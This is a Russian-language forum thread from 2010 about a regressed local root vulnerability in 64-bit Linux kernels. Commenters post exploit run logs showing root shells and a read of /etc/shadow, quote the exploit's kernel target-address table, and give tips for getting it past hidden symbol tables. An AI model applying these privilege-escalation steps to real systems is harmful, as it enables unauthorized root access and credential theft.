The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от opennews (??) on 16-Сен-10, 11:59 
В 2007 году была обнаружена уязвимость в 64-разрядных Linux-ядрах, которая позволяла непривилегированному локальному пользователю получить root-доступ к системе из-за небезопасной трансляции 32-битных вызовов. Ошибка на тот момент была исправлена и всё про неё благополучно забыли.


Ben Hawkes, который изначально нашёл эту уязвимость, недавно обнаружил (http://sota.gen.nz/compat2/), что проблема снова возникла в ядре в виду того, что в 2008 году из-за первоначального патча появилась регрессия и код был поправлен (http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.3...) таким образом, что ядро снова стало уязвимо. Сделав небольшую правку изначального кода exploit'a, Ben Hawkes добился его работоспособности (http://sota.gen.nz/compat2/robert_you_suck.c) во всех свежих 64-битных Linux-ядрах.


Таким образом, все свежие 64-битные ядра являются уязвимыми к локальной атаке, и в случае использования Linux для организации ...

URL: http://sota.gen.nz/compat2/
Новость: https://www.opennet.ru/opennews/art.shtml?num=27979

Высказать мнение | Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +1 +/
Сообщение от Samm email(??) on 16-Сен-10, 11:59 
имя файло robert_you_suck.c доставляет, да )
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

25. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –2 +/
Сообщение от Demo (??) on 16-Сен-10, 13:20 
Куда доставляет? И к чему там "да" в конце предложения?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

38. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +6 +/
Сообщение от Demo (??) on 16-Сен-10, 14:29 
>Вы шутите, правда?

К вам претензий нет. Продолжайте.

Высказать мнение | Ответить | Правка | Наверх | Cообщить модератору

51. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –2 +/
Сообщение от szh (ok) on 16-Сен-10, 16:42 
жаргон - http://lurkmore.ru/%D0%94%D0%BE%D1&...
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

53. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +2 +/
Сообщение от Demo (??) on 16-Сен-10, 17:24 
А, это вы про так-называемые "лулзы" и проч... Да это же китч, не стоящий ни малейшего внимания.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

60. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Samm email(??) on 16-Сен-10, 19:00 
Вы негодный, толстый троль.  Кстати, фраза robert, you sucks тоже имеет отношение к этому вашему аниме.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

46. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от User294 (ok) on 16-Сен-10, 16:07 
В "боевой" версии эксплойта есть какие-то "лестные" коменты в адрес Ben'а :)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

2. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Аноним (??) on 16-Сен-10, 12:01 
откуда инфа про ben hawkes? эксплоит сегодня в full-disclosure выложили Ac1dB1tch3z:

http://seclists.org/fulldisclosure/2010/Sep/268

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

3. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от 123456 (??) on 16-Сен-10, 12:16 
по-моему это разные эксплойты
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

6. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +2 +/
Сообщение от Аноним (??) on 16-Сен-10, 12:22 
>по-моему это разные эксплойты

да, тот что от hawkes - просто poc. а тот что от acid bitches - боевой варез с обходом селинуксов и прочего.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

48. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +1 +/
Сообщение от User294 (ok) on 16-Сен-10, 16:12 
>да, тот что от hawkes - просто poc. а тот что от
>acid bitches - боевой варез с обходом селинуксов и прочего.

Судя по стилю сырца исходника, Ac1dB1tch3z отрабатывают свое название на все 120%... :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

5. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Аноним (??) on 16-Сен-10, 12:20 
а, сорри гоню.
эксплоит выложен в ответ на публикацию уязвимости by ben hawkes.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

7. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от neo_teosoft on 16-Сен-10, 12:26 
А что там нужно поправить что бы он собирался?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

4. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +1 +/
Сообщение от Жирный ублюдок DBA on 16-Сен-10, 12:17 
На CentOS 5.5 не работает.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

11. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +4 +/
Сообщение от аноним on 16-Сен-10, 12:45 
>На CentOS 5.5 не работает.

И не должно. Это ж Red Hat.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

10. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +5 +/
Сообщение от аноним on 16-Сен-10, 12:44 
>Компания RedHat заявила, что ядра, поставляемые в дистрибутивах RHEL 3, 4 и 5 (соответственно и в CentOS), не являются уязвимыми, так как проблемный патч d4d67150 не был принят.

Вот так redhat ненавязчиво показал, кто на самом деле заботится о безопасности, а кто только делает вид и поднимает шум.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

13. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –1 +/
Сообщение от svn (??) on 16-Сен-10, 12:52 
>Вот так redhat ненавязчиво показал, кто на самом деле заботится о безопасности, а кто только делает вид и поднимает шум.

Ага, только изменение открывающее эту дыру было сделано сотрудниками redhat!
Намеренно подложили мину тем кто использует ванильное ядро, а сами её обошли?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

18. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –3 +/
Сообщение от szh (ok) on 16-Сен-10, 13:02 
>Ага, только изменение открывающее эту дыру было сделано сотрудниками redhat!
>Намеренно ?

В злых намереньях подозревай анонимуса которому отвечаешь, а не сотню разработчиков редхат, что они вошли в сговор с десятком менеджеров (а иначе эта бага пролезла бы и в продукты редхат). Не забывай, люди со временем увольняются из компании, и могут все рассказать.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

24. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +5 +/
Сообщение от аноним on 16-Сен-10, 13:18 
Банальный пофигизм. В своих ведрах дыру закрыли, а на ванилу положили. Типа собщество разберется
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

19. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +7 +/
Сообщение от аноним on 16-Сен-10, 13:09 
>Ага, только изменение открывающее эту дыру было сделано сотрудниками redhat!

Редхат настолько суров, что посылает нафиг даже своих сотрудников, если патч кривой.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

16. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –6 +/
Сообщение от szh (ok) on 16-Сен-10, 12:59 
> Вот так redhat ненавязчиво показал, кто на самом деле заботится о безопасности, а кто только делает вид и поднимает шум.

у тебя проблемы, ты не понимаешь где есть логические связи и где их нет.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

21. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –2 +/
Сообщение от аноним on 16-Сен-10, 13:10 
>у тебя проблемы, ты не понимаешь где есть логические связи и где их нет.

Ага, значит, намек был понят и бурная эмоциональная реакция имела место быть.
Что ж, жизнь, она суровая. И склонна разрушать розовые фантазии.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

77. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –1 +/
Сообщение от szh (ok) on 16-Сен-10, 21:24 
> Ага, значит, намек был понят и бурная эмоциональная реакция имела место быть.

хочешь пофлудить на тему оффтопика, троллик ?

> Что ж, жизнь, она суровая. И склонна разрушать розовые фантазии.

пока что ты активно создаешь розовые фантазии о редхате.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

27. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +2 +/
Сообщение от аноним on 16-Сен-10, 13:23 
>у тебя проблемы,

Правда?

>ты не понимаешь где есть логические связи и где их нет.

По-моему, все очевидно.

Редхат действительно заботится о безопасности, и не принимает сомнительные патчи, даже если их написали свои же сотрудники.

А есть дистры, которые не шибко-то беспокоятся о безопасности, но если их раз в пять лет таки удалось выпустить апдейт раньше конкурентов, они превращают это в шоу со свистами, плясками и карнавалами, трубя на каждом углу о своей доблести. Судьба же конкурентов, не успевающих распространить апдейты именно из-за этой свистопляски, наших доблестных борцунов волнует мало.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

41. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  –2 +/
Сообщение от pva (??) on 16-Сен-10, 14:39 
Редхат использует древние ядра и посему у них этой проблемы нет. Ка бы использовали что-то новое, то имели бы те же проблемы, что и все...

А текст новости написан повоцирующе. Зря.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

47. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +2 +/
Сообщение от cryo email(ok) on 16-Сен-10, 16:10 
Редхат-ядро вообще сложно сравнивать с ванила-ядром, и, тем более, определять, что свежее.

В рэдхат-ядре встречаются и бэкпорты из свежайших ядер ванилы, но при этом отсутствует многое из того, что давно принято в ванилу, но по каким-то причинам не прошло внутренний тест редхата.

Ключевое слово - продакшин. Редхат старается держать свои ядра в состоянии, пригодном для промышленного применения своей системы.

Да, если сравнивать по кол-ву свистелок и перделок в ядре - рэдхат безнадежно отстал :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

43. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Аноним (??) on 16-Сен-10, 14:53 
>Делаю выводы только исходя из того, что написано в новости.
>Если вы посвященный в таинства тысяч патчей Редхата, расскажите, будьте так любезны,
>зачем они в ванильное ядро бэкдор пропихнули, а у себя молча
>его отклонили, как так получилось?

в эксплоите описаны следующие таргеты:

struct LSM_rhel known_targets[4]=
{
  {
    0xffffffff8031e600ULL,
    0xffffffff8031fec0ULL,
    0xffffffff804acc00ULL,

    0xffffffff804af960ULL,
    0xffffffff8049b124ULL,

    "2.6.18-164.el5",
    "#1 SMP Thu Sep 3 03:28:30 EDT 2009"  // to manage minor/bug fix changes
  },
  {
   0xffffffff8031f600ULL,
   0xffffffff80320ec0ULL,
   0xffffffff804afc00ULL,

   0xffffffff804b2960ULL,
   0xffffffff8049e124ULL,

   "2.6.18-164.11.1.el5",
   "#1 SMP Wed Jan 6 13:26:04 EST 2010"
  },
  {
    0xffffffff805296a0ULL,
    0xffffffff8052af60ULL,
    0xffffffff806db1e0ULL,

    0xffffffff806ddf40ULL,
    0xffffffff806d5324ULL,

    "2.6.18-164.11.1.el5xen",
    "#1 SMP Wed Jan 20 08:06:04 EST 2010"   // default xen
  },
  {
    0xffffffff8031f600ULL,// d selinux_ops
    0xffffffff80320ec0ULL,// d capability_ops
    0xffffffff804afc00ULL,// B dummy_security_ops

    0xffffffff804b2960ULL,// B selinux_enforcing
    0xffffffff8049e124ULL,// B audit_enabled

    "2.6.18-164.11.1.el5",
    "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
   }

};

Так что работает оно в редхате с этими ядрами. нету заговора

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

70. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Sectoid (??) on 16-Сен-10, 19:49 
>...
>"2.6.18-164.11.1.el5",
>...
>Так что работает оно в редхате с этими ядрами. нету заговора

Подтверждаю, работает. CentOS 5.5.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

33. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +2 +/
Сообщение от anonymous (??) on 16-Сен-10, 13:38 
Проверил у себя - собирается, работает :(
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

34. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +1 +/
Сообщение от prapor (??) on 16-Сен-10, 13:51 
syeg % ./robert_you_suck                                                  ~/tmp
resolved symbol commit_creds to 0xffffffff81097c70
resolved symbol prepare_kernel_cred to 0xffffffff81097f60
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.1# id
uid=0(root) gid=0(root) групи=0(root) контекст=system_u:system_r:kernel_t:s0
sh-4.1# cat /etc/redhat-release
Red Hat Enterprise Linux release 6.0 Beta (Santiago)
sh-4.1#
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

35. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Vitaly_loki (ok) on 16-Сен-10, 13:56 
Таки работает что ли?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

61. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Michael Shigorin email(ok) on 16-Сен-10, 19:06 
ALT (обычный и ovz):

$ ./ABftw
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r    
$$$ K3rn3l r3l3as3: 2.6.32-std-def-alt20.M50P.1
[...]
$$$ 0v3r thr0w f0ps g0v3rnm3nt
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!

$ ./ABftw
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ K3rn3l r3l3as3: 2.6.18-ovz-rhel-alt12
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
!!! N0t a RH3l k3rn3l
!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!
!!! 3v3ryth3ng f41l3d!!*@&^@&*^ () * try an0th3r 0d4y L0l

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

64. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от User294 (ok) on 16-Сен-10, 19:20 
Там в сплойте комент есть что OVZ payload выпилен от скрипткиддей подальше. Это никак не связано с everything failed?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

71. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Michael Shigorin email(ok) on 16-Сен-10, 19:53 
>Там в сплойте комент есть что OVZ payload выпилен от скрипткиддей подальше.

Читал.  Проверил левоюзером в VE и на HN, выхлоп идентичный.

>Это никак не связано с everything failed?

Нинаю. :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

36. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Viliar (ok) on 16-Сен-10, 14:11 
Таки про шестерку они не писали :-D Оно еще бета.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

37. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  –1 +/
Сообщение от Alikus (ok) on 16-Сен-10, 14:12 
Собрал. Не работает :(
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

40. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  –4 +/
Сообщение от Аноним (??) on 16-Сен-10, 14:36 
>Собрал. Не работает :(

работать будет только в RHEL!!!
в собачей моче (Gentoo) и в Debian sid не работает - ядра как grsec/pax так и без.

Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.32
$$$ prepare_creds->ffffffff81050750
$$$ override_creds->ffffffff81050680
$$$ revert_creds->ffffffff810508b0
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

42. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +1 +/
Сообщение от Аноним (??) on 16-Сен-10, 14:42 
таки работает на Debian
Linux sindicat 2.6.32 #2 SMP Wed Aug 18 12:00:42 EEST 2010 x86_64 GNU/Linux

$ ./robert_you_suck
resolved symbol commit_creds to 0xffffffff81050920
resolved symbol prepare_kernel_cred to 0xffffffff81050820
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
# id
uid=0(root) gid=0(root) groups=0(root)
#

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

49. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от neo_teosoft on 16-Сен-10, 16:37 
А какие правки вы внесли в код что бы он компилировался?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

79. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от slepnoga (??) on 16-Сен-10, 21:34 

>в собачей моче (Gentoo) и в Debian sid не работает - ядра

с мочой удавись от злости :)
slep@mini ~ $ ./a.out
resolved symbol commit_creds to 0xffffffff810651e0
resolved symbol prepare_kernel_cred to 0xffffffff810658d0
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.1# id
uid=0(root) gid=0(root) группы=0(root)

sh-4.1# uname -a
Linux mini 2.6.35-gentoo-r5-1.04 #1 SMP PREEMPT Sun Sep 5 04:09:31 EEST 2010 x86_64 Intel(R) Atom(TM) CPU 330 @ 1.60GHz GenuineIntel GNU/Linux
sh-4.1#

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

39. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от i (??) on 16-Сен-10, 14:30 
таки не работает inux aquinas 2.6.34-hardened-r1-grsec #1 SMP PREEMPT Tue Jul 13 18:49:32 MSD 2010 x86_64 Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz GenuineIntel GNU/Linux


exploit@aquinas ~ $ ./robert_you_suck
symbol table not available, aborting!
Process finished

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

65. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Pentium02 email on 16-Сен-10, 19:22 
Сделайте так, например
замените /proc/kallsyms на путь к System.map

        f = fopen("/proc/kallsyms", "r");
        if (f == NULL) {
                f = fopen("/proc/ksyms", "r");
                if (f == NULL)
                        return 0;
                oldstyle = 1;
        }

например:

        f = fopen("/boot/System.map-genkernel-x86_64-2.6.35-zen2", "r");
        if (f == NULL) {
                f = fopen("/boot/System.map-genkernel-x86_64-2.6.35-zen2", "r");
                if (f == NULL)
                        return 0;
                oldstyle = 1;
        }

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

84. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от i (??) on 17-Сен-10, 09:41 
Ура заработало! :))
после чтения System.map из доступного каталога

exploit@aquinas ~ $ ./robert_you_suck
resolved symbol commit_creds to 0xffffffff82058a20
resolved symbol prepare_kernel_cred to 0xffffffff82058700
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
sh-4.0#
sh-4.0# cat /etc/shadow
root:$6$i1aC.........

и все же, kallsyms ksyms и System.map от юзера скрыты:
exploit@aquinas ~ $ ls -l /usr/src/linux/
ls: невозможно открыть каталог /usr/src/linux/: Отказано в доступе
exploit@aquinas ~ $ ls -l /boot/
ls: невозможно открыть каталог /boot/: Отказано в доступе

В данном случае без не большой помощи рута не работало :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

103. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от taaroa (ok) on 21-Сен-10, 00:47 
~/tmp%  gcc robert_you_suck.c
~/tmp% ./a.out
symbol table not available, aborting!
Process finished
~ra# cp /boot/System.map-zZ-x86_64-2.6.34-hardened-r4 tmp/
~ra# gradm -S
The RBAC system is currently disabled.
~/tmp% cp robert_you_suck.c robert_you_suck2.c && nano -w robert_you_suck2.c && gcc robert_you_suck2.c
~/tmp% ./a.out
resolved symbol commit_creds to 0xffffffff810a6d90
resolved symbol prepare_kernel_cred to 0xffffffff810a7170
mapping at 3f80000000
mmap fault
Process finished
~/tmp% uname -a
Linux taaroa 2.6.34-hardened-r4 #3 SMP Fri Sep 10 21:09:54 KRAST 2010 x86_64 AMD Phenom(tm) II X4 925 Processor AuthenticAMD GNU/Linux

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

44. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Alex email(??) on 16-Сен-10, 15:16 
А кто такоей Роберт то?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

45. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним (??) on 16-Сен-10, 15:43 
>А кто такоей Роберт то?

вы с лора? по ссылками не ходите?
грепните по ссылке по "Robert Swiecki"

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

50. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от hexium (ok) on 16-Сен-10, 16:41 
>> exploit@aquinas ~ $ ./robert_you_suck
>> symbol table not available, aborting!
>> Process finished

Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
commit_creds = 0xffffffff8106e760;
prepare_kernel_cred = 0xffffffff8106e5d0;
Уникально для каждой сборки.

Короче, shit happens ;)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

62. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Michael Shigorin email(ok) on 16-Сен-10, 19:13 
>Адреса функций найдите в vmlinux и подставьте в код эксплоита.

У некоторых /boot 0700, придётся как минимум отдельно заморочиться найти тот же пакет. ;)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

57. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним (??) on 16-Сен-10, 18:09 
>>Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
>>commit_creds = 0xffffffff8106e760;
>>prepare_kernel_cred = 0xffffffff8106e5d0;
>>Уникально для каждой сборки.

где их там искать?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

74. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от pavlinux (ok) on 16-Сен-10, 21:11 
>>>Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
>>>commit_creds = 0xffffffff8106e760;
>>>prepare_kernel_cred = 0xffffffff8106e5d0;
>>>Уникально для каждой сборки.
>
>где их там искать?

# nm vmlinux | grep -E ' commit_creds| prepare_kernel_cred'

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

81. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от pavlinux (ok) on 17-Сен-10, 00:36 
>>>>Адреса функций найдите в vmlinux и подставьте в код эксплоита. Что-то типа
>>>>commit_creds = 0xffffffff8106e760;
>>>>prepare_kernel_cred = 0xffffffff8106e5d0;
>>>>Уникально для каждой сборки.
>>где их там искать?
># nm vmlinux | grep -E ' commit_creds| prepare_kernel_cred'

Зачем про rm pavlinux потёрли коммент :)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

59. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от i (??) on 16-Сен-10, 18:56 
ну так найдите подставте, на то оно CONFIG_GRKERNSEC_HIDESYM=y в ядре
If you say Y here, getting information on loaded modules, and
displaying all kernel symbols through a syscall will be restricted
to users with CAP_SYS_MODULE. This option will aid in providing a
useful protection against local kernel exploitation of overflows
and arbitrary read/write vulnerabilities.

И кстати вот не харденед ядро тоже не сработало:
$ uname -a
Linux games 2.6.29-gentoo-r5 #1 PREEMPT Mon Jun 1 11:47:47 MSD 2009 x86_64 Intel(R) Pentium(R) 4 CPU 3.00GHz GenuineIntel GNU/Linux
$ ./robert_you_suck
resolved symbol commit_creds to 0xffffffff80247d2e
resolved symbol prepare_kernel_cred to 0xffffffff80247e62
mapping at 3f80000000
UID 1611, EUID:1611 GID:1616, EGID:1616
sh-3.2$ cat /etc/shadow
cat: /etc/shadow: Отказано в доступе
sh-3.2$ exit
c^C

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

66. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от crypt (??) on 16-Сен-10, 19:39 
Да... веселые новости пошли... Мне больше всего заинтересовала это место:

This exploit has been tested very thoroughly over the course of the past few years on many many targets.

Thanks to redhat for being nice enough to backport it into early kernel versions

Так бы не нашли и жили бы с этим еще пару лет.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

69. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним (??) on 16-Сен-10, 19:43 
Gentoo 2.6.35.4-ck1 работает :(
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

73. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от pavlinux (ok) on 16-Сен-10, 21:01 
pavel@suse64:~> gcc -m32 abftw.c
pavel@suse64:~> ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.32.21
$$$ prepare_creds->ffffffff8105ea90
$$$ override_creds->ffffffff8105ea40
$$$ revert_creds->ffffffff8105ebc0
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z


А чё должно быть-то?

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

76. "не тот код"  +/
Сообщение от Вова on 16-Сен-10, 21:24 

http://sota.gen.nz/compat2/robert_you_suck.c
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

87. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от Аноним (??) on 17-Сен-10, 11:11 
а -m32 ты зачем добавил?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

90. "чтобы скомпилировать"  +/
Сообщение от Вова on 17-Сен-10, 12:14 
>а -m32 ты зачем добавил?

эксплойт от эйсид бич иначе не компилируется.

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

92. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от pavlinux (ok) on 17-Сен-10, 13:42 
>а -m32 ты зачем добавил?

$ cat ABftw.c | sed -n '60,63p';

#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

82. "Обнаружена локальная root-уязвимость в 64-битных Linux-ядрах..."  +/
Сообщение от temper on 17-Сен-10, 01:27 
Вот этот работает на centos 5.5: http://seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin

[user@srv src]$ uname -a
Linux srv 2.6.18-164.11.1.el5xen #1 SMP Wed Jan 20 08:06:04 EST 2010 x86_64 x86_64 x86_64 GNU/Linux
[user@srv src]$ id
uid=505(user) gid=506(user) groups=503(admins),506(user)
[user@srv src]$ ./expl
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-164.11.1.el5xen
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ Th1z b1tch 1z t0azt. kn0wn t4rg3t: 2.6.18-164.11.1.el5xen #1 SMP Wed Jan 20 08:06:04 EST 2010
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=506(user) groups=503(admins),506(user)

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

85. "Обнаружена локальная root-уязвимость в 64-битных ядрах, выпу..."  +/
Сообщение от Humanoid on 17-Сен-10, 10:11 
humanoid@UFO /media/disk $ ./a.out
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.35-gentoo-r4-1
$$$ prepare_creds->ffffffff81080833
$$$ override_creds->ffffffff8108040c
$$$ revert_creds->ffffffff810805ed
$$$ Kernel Credentials detected
!!! Err0r 1n s3tt1ng cr3d sh3llc0d3z

опять неудача =\ на федоре был, 2 эксплоита мимо, перешёл на генту, опять невезуха...

Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

